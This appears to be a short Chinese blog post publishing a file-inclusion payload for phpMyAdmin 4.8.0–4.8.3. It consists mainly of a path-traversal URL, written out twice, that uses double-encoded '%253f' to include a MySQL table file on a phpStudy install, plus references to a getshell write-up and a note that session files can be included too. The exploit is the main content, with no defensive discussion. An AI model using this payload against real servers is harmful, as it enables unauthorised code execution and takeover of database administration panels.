payload:1
http://127.0.0.1/phpmyadmin-4.8.1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/foo/bar.frm
参考链接:【首发】phpmyadmin4.8.1后台getshell
还可以包含session文件:https://yq.aliyun.com/articles/603201
没有网络安全,就没有国家安全
payload:1
http://127.0.0.1/phpmyadmin-4.8.1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/foo/bar.frm
参考链接:【首发】phpmyadmin4.8.1后台getshell
还可以包含session文件:https://yq.aliyun.com/articles/603201
本文标题:phpmyadmin4.8.0~4.8.3任意文件包含payload
文章作者:boogle
发布时间:2018年12月25日 - 14:01
最后更新:2019年03月07日 - 11:37
原始链接:https://zhengbao.wang/phpmyadmin4-8-0-4-8-3任意文件包含/
许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。
微信支付
支付宝